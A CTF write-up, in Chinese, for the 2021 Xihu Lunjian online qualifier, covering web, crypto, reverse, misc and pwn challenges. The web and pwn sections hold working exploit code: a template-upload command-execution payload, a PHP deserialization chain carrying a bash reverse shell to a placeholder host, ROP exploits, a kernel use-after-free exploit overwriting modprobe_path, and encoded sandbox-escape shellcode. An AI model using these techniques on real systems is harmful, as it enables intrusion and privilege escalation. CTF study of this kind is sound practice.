2021 西湖论剑 线上初赛 WP

2021 西湖论剑 线上初赛 WP

web

web2

import requests

def test(payload):
    """Upload *payload* as ``index.latte`` to the challenge instance and then
    request the site root so the server renders the uploaded file.

    Both response bodies are printed; nothing is returned. The commented-out
    ``proxies`` argument of the original (a local intercepting proxy) is
    intentionally not passed.
    """
    url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"
    upload = {'file': ("index.latte", payload)}
    # proxies={"http": "127.0.0.1:8080"} was used here for inspection originally
    uploaded = requests.post(url, files=upload)
    print(uploaded.text)
    rendered = requests.get(url)
    print(rendered.text)

# Template body uploaded as index.latte. Once the server renders it, the
# expression calls system() on the POSTed `cmd` parameter, i.e. the upload
# becomes a command-execution endpoint. Root cause on the server side is
# rendering a user-controlled upload as a template; the line break after `//`
# is part of the payload as written (its purpose is not explained here, so
# keep it when editing).
payload = """{=system//
($_POST["cmd"])}"""

test(payload)

# Second request: exercise the uploaded template with the command to run.
data = {
    "cmd":"cat /flag"
}


# Same instance URL as inside test(); duplicated here as in the original.
url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"

r = requests.post(url,data=data)

print(r.text)

web3


web4

////绕过parse_url

<?php 

namespace League\Flysystem\Cached\Storage {
    // Stand-in for the library class of the same name: only the properties
    // the deserialization chain relies on are declared, so that serialize()
    // emits the expected property set. Per the writeup, $complete is the
    // string that ends up being executed (the "reverse shell" step); `ip` is
    // a placeholder for the listener host. Defensive takeaway: unserialize()
    // of attacker-controlled data is the root cause, not any single class.
    abstract class AbstractCache {
        protected $autosave = false;
        protected $complete = "`bash -c 'exec bash -i &>/dev/tcp/ip/3333 <&1'`";
        // protected $complete = "\"&whoami&" ;
        // Backticks are not interpreted on Windows; `&` is used there instead.
    }
}

namespace think\filesystem {
    use League\Flysystem\Cached\Storage\AbstractCache;
    // Stand-in for think\filesystem\CacheStore. $store receives the File
    // driver object built at the bottom of the script; $key is an arbitrary
    // filler value. Property names/order presumably must match the real
    // class for the serialized form to be accepted — not verifiable here.
    class CacheStore extends AbstractCache {
        protected $key = "1";
        protected $store;
        public function __construct($store="") {
            $this->store = $store;
        }
    }
}

namespace think\cache {
    // Stand-in for think\cache\Driver. $options is what the chain feeds to the
    // cache driver; "serialize" => ["system"] names the callable the driver is
    // presumably made to invoke (the exact call path is not shown in this
    // listing). The other keys are filler values.
    abstract class Driver {
        protected $options = ["serialize"=>["system"],"expire"=>1,"prefix"=>"1","hash_type"=>"sha256","cache_subdir"=>"1","path"=>"1"];
    }
}

namespace think\cache\driver {
    use think\cache\Driver;
    // Empty subclass: its only purpose is to put the class name
    // think\cache\driver\File into the serialized object.
    class File extends Driver{}
}

namespace {
    // Assemble the chain (a CacheStore wrapping a File driver) and print it
    // URL-encoded so it can be placed directly into a request parameter.
    $chain = new think\filesystem\CacheStore(new think\cache\driver\File());
    echo urlencode(serialize($chain));
}
?>

反弹shell即可

cry

hardrsa

from gmpy2 import *
from Crypto.Util.number import getPrime, long_to_bytes

import sympy

# Challenge parameters, kept verbatim. Only c, dp and p are used by the
# decryption below; e, g, y, c1, pd and x are not referenced in this listing
# (presumably inputs to the step that recovered p, which is not shown).
e = 0x10001
g = 2
y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473

c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059

pd = 24869782389865450501811571588222344463610376331618976983194310327543361050399067805113576647152708173449058210620622984193023800730206452772983672334055867000

x = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740

p = 12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741
# If dp is the CRT exponent d mod (p - 1) (assumed from its name; not checkable
# here), then c^dp mod p == m mod p, so a single modular exponentiation yields
# the plaintext as long as m < p. long_to_bytes turns the integer back into text.
print(long_to_bytes(pow(c,dp,p)))

数独

re

ROR

输入40个字节,然后加密后比较。
八个字节一组加密,直接z3或者angr都能出。。。。。

虚假的粉丝。

输入三个参数,一个是文件的序号,读取的起始位置和读取字节数。


然后11个字节,开头A结尾R,就脑洞猜key(无语) Alan Walker
最后猜出正确变体:Al4N_wAlK3R
解密得到字符画flag

misc

misc3_yusa的小秘密

bytectf原题,直接拿之前的脚本处理图片,处理后的图片上有flag。

from cv2 import cv2 as cv
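# Input image path as given in the writeup (no extension).
img = cv.imread('ps')
if img is None:
    # cv.imread returns None instead of raising when the file is missing or
    # unreadable; fail here with a clear message rather than inside cvtColor.
    raise FileNotFoundError("cv.imread could not read 'ps'")
# Convert to luma/chroma so each plane can be inspected separately.
src = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)
Y, Cr, Cb = cv.split(src)
# (plane % 2) isolates the least significant bit of every pixel; * 255 makes
# it a visible black/white image. Per the writeup the flag shows up in one
# of these LSB planes.
for name, plane in (('Y.png', Y), ('Cr.png', Cr), ('Cb.png', Cb)):
    cv.imwrite(name, (plane % 2) * 255)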

misc5_Yusa的秘密

volatility分析 首先在桌面文件中发现了sakura相关的文件 同时发现用户名为yusa 于是以sakura和yusa为关键词dump可能有用的文件 最后找到了许多 其中关键的有mystery man.contact , yusa-didi ,key.zip
mystery man.contact中有一段base32,解码获得一段base64,再解码获得一个key,这个key用来解开yusa-didi这个压缩包,里面是一张key.bmp。然后根据题目给的原附件的who i am想到了用户密码 ,使用mimikatz插件获得YusaYusa520。然后根据yusa.contact中备忘录的提示dump下来stickynote进程 在其中发现了rtf模板保存下来获得key.zip的密码 key.zip解压后是一个脚本 读取key.bmp里的像素作为异或key加密flag 成了who i am 写一个解密脚本解密发现是张GIF图 最后分解GIF图在其中一帧上找到flag

pwn

pwn1_string_go

在lative_fuc中存在两个漏洞,第一个是输入的size可以是负数,导致可以直接向上溢出,从而泄漏canary和libc地址。其二是memcpy存在栈溢出,rop执行system("/bin/sh")

from pwn import *
# import pwnlib.asm as asm
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
# 1 = local process with the system libc; anything else = the remote instance
# with the challenge-provided libc-2.27.so expected in the working directory.
local = 1
if local == 1:
    p = process('./string_go')
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # Script-template placeholders: rdi is reassigned further down, the
    # others are never read in this script.
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    syscall = 0
    gadgets = []
else:
    p = remote('82.157.20.104', 56700)
    lb = ELF('libc-2.27.so')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    gadgets = []
    syscall = 0


def new(off, x1, x2):
    """Drive menu option 3 of the target: answer the four ``'>>> '`` prompts
    with ``'3'``, ``off`` (as text), ``x1`` and ``x2``, in that order.

    ``p`` is the module-level tube; nothing is returned.
    """
    for answer in ('3', str(off), x1, x2):
        p.sendlineafter('>>> ', answer)

# Negative size (-8): per the writeup the length check is signed, so the copy
# lands above the buffer and the program's own output then reveals stack data.
new(-8, 'a'*0xf, '\xf0')
p.recvn(0x20)
# The first 0x7f-terminated 6-byte run is taken as a libc pointer; 0x98e200 is
# its fixed distance from the libc base for the libc build this script targets.
libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc = libc_addr-0x98e200
p.recvn(18)
canary = u64(p.recvn(8))
print('canary = ', hex(canary))
print('libc:', hex(libc))

p.recvuntil('>>> ')
# Gadget offsets belong to the same libc build as the 0x98e200 constant above.
ret_addr = libc + 0xc0c9d
rdi = libc + 0x215bf

# Frame: 0x18 bytes of padding, the leaked canary put back in place, 0x18 more
# bytes up to the return address, then ret_addr (presumably a lone `ret` for
# stack alignment), pop rdi, "/bin/sh", system.
# NOTE: str + bytes concatenation and the .next() call are Python 2 idioms;
# under Python 3 this needs b'' literals and next(lb.search(...)).
payload = 'a'*0x18 + p64(canary) + 'a'*0x18 + p64(ret_addr) + p64(rdi)
payload += p64(libc + lb.search('/bin/sh\x00').next()) + \
    p64(libc + lb.sym['system'])
p.sendline(payload)

p.interactive()

pwn2_blind

这题是栈溢出,因为got表可写且没开pie,直接利用csu布置参数修改alarm低字节到syscall指令(需要爆破)。然后通过syscall执行exec("/bin/sh", 0, 0);

from signal import alarm
from pwn import *
# import pwnlib.asm as asm
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
# 0 = remote instance; 1 = local run under gdb (see the second `if local` below).
local = 0
elf = ELF("./blind")
if local == 1:
    # p = process('./blind')
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # Script-template placeholders; none of rdi/rsi/rdx/rax/syscall/gadgets/lb
    # is read anywhere in this script.
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    syscall = 0
    gadgets = []
else:
    p = remote('82.157.6.165', 51000)
    # lb = ELF('libc.so')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    gadgets = []
    syscall = 0
if local == 1:
    p = gdb.debug('./blind', 'b *0x40074C')


# Only used as the padding width of the last send below.
exid = 0x3b
ap = 0x400560  # not referenced in this script
ag = elf.got['alarm']  # GOT slot that the chain reads into, then calls through
rg = elf.got['read']
bss = elf.bss()


def csu(func_got, arg0, arg1, arg2):
    """Return one ret2csu frame (bytes) for the __libc_csu_init gadgets of
    ./blind at 0x4007B6 (register pops) and 0x4007A0 (register moves + call).

    The frame pops rbx=0, rbp=1, r12=func_got and r13/r14/r15=arg0/arg1/arg2,
    then jumps to the move-and-call gadget, which calls *func_got.
    """
    pop_gadget = 0x4007B6
    call_gadget = 0x4007A0
    words = [pop_gadget + 4, 0, 1, func_got, arg0, arg1, arg2, call_gadget]
    return b''.join(p64(w) for w in words)


# Overflow: 0x58 bytes to the saved return address, then three ret2csu frames
# (see csu()). Which argument lands in which register depends on the gadget at
# 0x4007A0; the usual __libc_csu_init layout moves r13/r14/r15 into
# rdx/rsi/edi, which is what the frames below assume.
pay = b'a'*0x58
# 1) read(0, alarm@got, 1): replace the low byte of alarm's GOT entry.
pay += csu(rg, 1, ag, 0)
# Filler for the register pops the call gadget performs after returning.
pay += p64(0)*7
# 2) read(0, bss, 0x100): stage the argument string in .bss.
pay += csu(rg, 0x100, bss, 0)
pay += p64(0)*7
# 3) call through alarm@got with rdi=bss, rsi=0, rdx=0.
pay += csu(ag, 0, 0, bss)

p.send(pay.ljust(0x500, b'\x01'))

# pause()
# New low byte for alarm@got (the value to brute-force per the writeup).
p.send(p8(0xd5))

# pause()
# Exactly 0x3b bytes are sent so that read() returns 0x3b, which is still in
# rax when step 3 runs — the syscall number is never set explicitly.
p.send(b'/bin/sh'.ljust(exid, b'\x00'))
# p.sendline('cat flag')
# ss=p.recv()
p.interactive()

pwn3_easykernel

show中存在溢出读,通过读写堆上的残留内容获得kernel地址绕过KASLR。其堆的释放没有清空指针,导致存在UAF,参考其保护机制

/*
 * Quoted from the Linux SLUB allocator (mm/slub.c) for reference. With
 * CONFIG_SLAB_FREELIST_HARDENED the free-list link stored in a freed object is
 * not the raw next pointer but ptr ^ s->random ^ swab(slot address). The
 * hardening only hides the link; an attacker who can read two encoded links
 * of known objects can solve for s->random, which is what the exploit below
 * does. Without the option the link is stored in the clear.
 */
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
                 unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    /*
     * When CONFIG_KASAN_SW_TAGS is enabled, ptr_addr might be tagged.
     * Normally, this doesn't cause any issues, as both set_freepointer()
     * and get_freepointer() are called with a pointer with the same tag.
     * However, there are some issues with CONFIG_SLUB_DEBUG code. For
     * example, when __free_slub() iterates over objects in a cache, it
     * passes untagged pointers to check_object(). check_object() in turns
     * calls get_freepointer() with an untagged pointer, which causes the
     * freepointer to be restored incorrectly.
     */
    return (void *)((unsigned long)ptr ^ s->random ^
            swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
    return ptr;
#endif
}

修改fd指针,指向modprobe_path实现提权。

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
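/*
 * HEX(x):   print x as a "[*]0x" + 16 hex digit line
 * LOG(msg): print msg on a "[*]" line
 * (show(), defined below, hex-dumps `size` 8-byte words starting at addr.)
 * The macro arguments are parenthesised so that an expression such as
 * HEX(kbase + off) is cast as a whole, not just its first operand.
 */
#define HEX(x) printf("[*]0x%016lx\n", (size_t)(x))
#define LOG(addr) printf("[*]%s\n", (addr))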
void show(u_int64_t *addr, int size)
{
    /*
     * Hex-dump `size` 8-byte words starting at addr, two words per row, each
     * row prefixed with its byte offset. An odd trailing word is printed with
     * a zero in the second column. Output goes to stdout between two rules.
     */
    static const char rule[] = "--------------------------------------------";
    int row;

    puts(rule);
    for (row = 0; row < size / 2; row++)
        printf("0x%04lx 0x%016lx 0x%016lx\n", (size_t)row * 0x10,
               (size_t)addr[2 * row], (size_t)addr[2 * row + 1]);
    if (size & 1)
        printf("0x%04lx 0x%016lx 0x%016lx\n", (size_t)row * 0x10,
               (size_t)addr[size - 1], 0ul);
    puts(rule);
}

int fd; // handle to /dev/kerpwn, opened in main() and used by every ioctl wrapper below

struct node
{
    /*
     * Request block handed to the driver's ioctl()s. The layout (32-bit
     * index, 64-bit size, user pointer) has to match the kernel module's own
     * definition; it is taken from the challenge and cannot be checked here.
     */
    u_int32_t idx;  // object slot number
    u_int64_t size; // byte count for the add/show/edit commands
    void *data;     // user buffer the driver copies from or to (per usage in main)
};

void sw(int idx, size_t size, void *data)
{
    /*
     * Driver command 0x40 ("show"): as used in main(), the caller reads
     * `size` bytes of object `idx` back out of `data` afterwards.
     * The ioctl return value is ignored, as in the original.
     */
    struct node req = { .idx = idx, .size = size, .data = data };
    ioctl(fd, 0x40, &req);
}

void edit(int idx, int size, void *data)
{
    /*
     * Driver command 0x50 ("edit"): per its use in main(), writes `size`
     * bytes from `data` into object `idx`. Return value ignored, as originally.
     */
    struct node req = { .idx = idx, .size = size, .data = data };
    ioctl(fd, 0x50, &req);
}
void dlt(int idx)
{
    /* Driver command 0x30 ("delete") for object `idx`; size and data are not used. */
    struct node req = { .idx = idx, .size = 0, .data = 0 };
    ioctl(fd, 0x30, &req);
}

void new (int size, void *data)
{
    /*
     * Driver command 0x20 ("add"). The pointer passed skips the idx field,
     * so the driver sees {size, data} starting at &req.size — kept exactly as
     * in the original; presumably the add command takes that shorter record.
     */
    struct node req = { .idx = 0, .size = size, .data = data };
    ioctl(fd, 0x20, &req.size);
}

#define __u64 u_int64_t
/*
 * 64-bit byte swap, spelled out so it does not depend on <byteswap.h>. This
 * is the userland counterpart of the swab() used by the kernel's
 * freelist_ptr() quoted above, needed to decode and re-encode the hardened
 * freelist links.
 */
#define swab64(x) ((__u64)((((__u64)(x) & (__u64)0x00000000000000ffULL) << 56) | \
                           (((__u64)(x) & (__u64)0x000000000000ff00ULL) << 40) | \
                           (((__u64)(x) & (__u64)0x0000000000ff0000ULL) << 24) | \
                           (((__u64)(x) & (__u64)0x00000000ff000000ULL) << 8) |  \
                           (((__u64)(x) & (__u64)0x000000ff00000000ULL) >> 8) |  \
                           (((__u64)(x) & (__u64)0x0000ff0000000000ULL) >> 24) | \
                           (((__u64)(x) & (__u64)0x00ff000000000000ULL) >> 40) | \
                           (((__u64)(x) & (__u64)0xff00000000000000ULL) >> 56)))

int main(int argc, char const *argv[])
{
    /*
     * Flow, as described in the writeup above: (1) leak a kernel pointer via
     * the driver's over-reading show command to get past KASLR, (2) recover
     * the SLUB freelist secret from freed objects that the driver still lets
     * us read (use-after-free: the slot is not cleared on delete), (3) point
     * a freelist link at modprobe_path so a later allocation overwrites it.
     * The constants 0x10f1fa0, 0x1663c00 and the 0xb8af marker are specific
     * to the challenge kernel.
     */
    fd = open("/dev/kerpwn", O_RDWR);
    if (fd == -1)
    {
        perror("[-]dev open:");
        exit(-1);
    }
    LOG("open success!");
    void *buf = malloc(0x10000);
    memset(buf, 'A', 0x1000); // only the first 0x1000 of the 0x10000 bytes are initialised

    LOG("leak the kalsr");
    // A 0x10-byte object is created and 0x100 bytes are read back from it;
    // the surplus is whatever the neighbouring slab memory holds.
    new (0x10, buf);
    memset(buf, 0, 0x200);
    sw(0, 0x100, buf);
    show(buf, (0x100) / 8);

    size_t *p = buf;
    size_t kbase = 0;
    // First word whose upper 32 bits are all ones is taken to be a kernel
    // pointer; its distance to the kernel base is a challenge-specific constant.
    for (int i = 0; i < 0x10; i++)
    {
        if ((p[i] >> 32) == 0xffffffffLL)
        {
            kbase = p[i] - 0x10f1fa0;
            break;
        }
    }

    // size_t kbase=*(size_t *)(buf+0x40);
    LOG("kernel base:");
    HEX(kbase);

    //use uaf to change modprobe path
    LOG("change modprobe path!");
    getchar(); // pause so the leaked state can be checked before continuing
    size_t mp = kbase + 0x1663c00;
    LOG("modprobe path");
    HEX(mp);

    int i, j;
    // uint64_t is not declared by the headers included above (<stdint.h> is
    // missing); it presumably arrives transitively on the original build.
    uint64_t xored_cookie = 0, heap_addr[26], temp, secret;
    char record[0x100]; // unused
    // NOTE: add() is not defined anywhere in this listing; new(size, data)
    // above has the matching shape and is presumably what was meant.
    for (i = 0; i < 25; i++)
        add(0x10, "abcd"); //1-25
    for (i = 1; i <= 25; i++)
        dlt(i);
    // The freed objects are still readable through the driver. Their first
    // word is now the (hardened) freelist link — see freelist_ptr() above;
    // 0xb8af is presumably a recognisable low-16-bit fragment of such a link
    // on this kernel.
    for (i = 1; i <= 25; i++)
    {

        sw(i, 0x100, buf);
        for (j = 0; j < 0x100; j += 8)
        {
            // &buf[j] on a void* relies on GCC's void-pointer arithmetic extension.
            if (((*(uint64_t *)&buf[j]) & 0xffff) == 0xb8af)
                xored_cookie = *(uint64_t *)&buf[j];
        }
    }
    if (xored_cookie)
        printf("success:%llx\n", xored_cookie);

    // From the links of two freed objects, reconstruct their addresses and
    // then s->random (`secret`) by inverting the xor/swab relation of
    // freelist_ptr(). heap_addr[] indices follow the object indices used above.
    sw(2, 16, buf);
    heap_addr[1] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
    printf("heap1 addr:0x%llx\n", heap_addr[1]);
    temp = *(uint64_t *)&buf[8];

    sw(3, 16, buf);
    heap_addr[2] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
    printf("heap2 addr:0x%llx\n", heap_addr[2]);

    secret = heap_addr[1] ^ swab64(heap_addr[2]) ^ temp;
    printf("secret:0x%llx\n", secret);

    sw(25, 16, buf);
    heap_addr[24] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
    printf("heap24 addr:0x%llx\n", heap_addr[24]);

    // Re-encode object 24's freelist link so that the allocator hands out
    // modprobe_path as an object; one of the add() calls below then lands on
    // it and writes "/tmp/c" there.
    sw(24, 8, buf);
    *(uint64_t *)&buf[8] = mp ^ swab64(heap_addr[24]) ^ secret;
    printf("attempt:%llx\n", *(uint64_t *)&buf[8]);
    edit(24, 16, buf);

    add(0x10,"abcd");
    add(0x10,"abcd");
    add(0x10,"/tmp/c");

    // /tmp/c copies the flag out; executing a file with an unknown magic makes
    // the kernel run the modprobe_path helper as root. On the kernel side
    // CONFIG_STATIC_USERMODEHELPER removes this target; on the driver side,
    // clearing the slot on delete would have removed the use-after-free.
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/c");
    system("chmod +x /tmp/c");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("chmod +x /tmp/dummy");

    system("/tmp/dummy");
    system("cat /tmp/flag");
    return 0;
}

pwn4_code_project

程序开始时将flag写入随机地址,并且开启沙箱禁用常用的读写和命令执行的系统调用。但是并未禁用writev系统调用,仍然可以通过它进行系统调用,而且程序只允许用可见字符对shellcode进行编码。这里直接利用alpha3工具进行编码。

'''
    xor r7, r7
    loop:
    mov r4, r7
    sal r4, 12
    push 0x14
    pop rax
    push 1
    pop rdi
    push 1
    pop rdx
    push 0x30
    push r4
    mov rsi, rsp
    syscall
    inc r7
    jmp loop

'''
from pwn import *
import inspect
from sys import argv

def leak(var):
    """Log *var* in hex under the name the caller bound it to.

    The name is found by identity (``is``) in the caller's locals, so the first
    local referring to the same object wins; raises IndexError if none does.
    Output goes through the module-level tube ``p``.
    """
    caller_locals = inspect.currentframe().f_back.f_locals
    matches = [name for name, value in caller_locals.items() if value is var]
    label = matches[0]
    p.info('{}: {:#x}'.format(label, var))

# Template leftovers: local_libc, local_libc_32, remote_libc and libc (below)
# are never read in this script.
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
local_libc_32 = '/lib/i386-linux-gnu/libc.so.6'
remote_libc = ''
binary = './code_project'
context.binary = binary
elf = ELF(binary,checksec=False)

# A local process is always started; with argv[1] == 'r' it is then replaced
# by the remote connection and simply left running.
p = process(binary)
if len(argv) > 1:
    if argv[1]=='r':
        p = remote('82.157.31.181',42400)
libc = elf.libc

# gdb breakpoint script; not passed to anything in this listing.
comm = ''
comm+= 'b *0x400b16\n'

# Readable reference only: open("flag"), read 0x30 bytes into 0x601240, write
# them to stdout. It is printed, not sent — per the writeup read/write are
# sandboxed and the input must be printable, so the payload actually sent is
# the encoded blob below.
shellcode =shellcraft.open("flag")
shellcode+= shellcraft.read(3,0x601240,0x30)
shellcode+= shellcraft.write(1,0x601240,0x30)
print(shellcode)


# alpha3-encoded (printable) shellcode; presumably the encoded form of the
# writev loop shown in the string at the top of the script.
shellcode = b'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M10108O1L4y3V16404j082s2G2n1k070k0Z05000Z180s2E0z8N3D0a042B8O403K4I2Z0Z'

p.sendlineafter(b'Hints: DASCTF{MD5}',shellcode)

p.interactive()

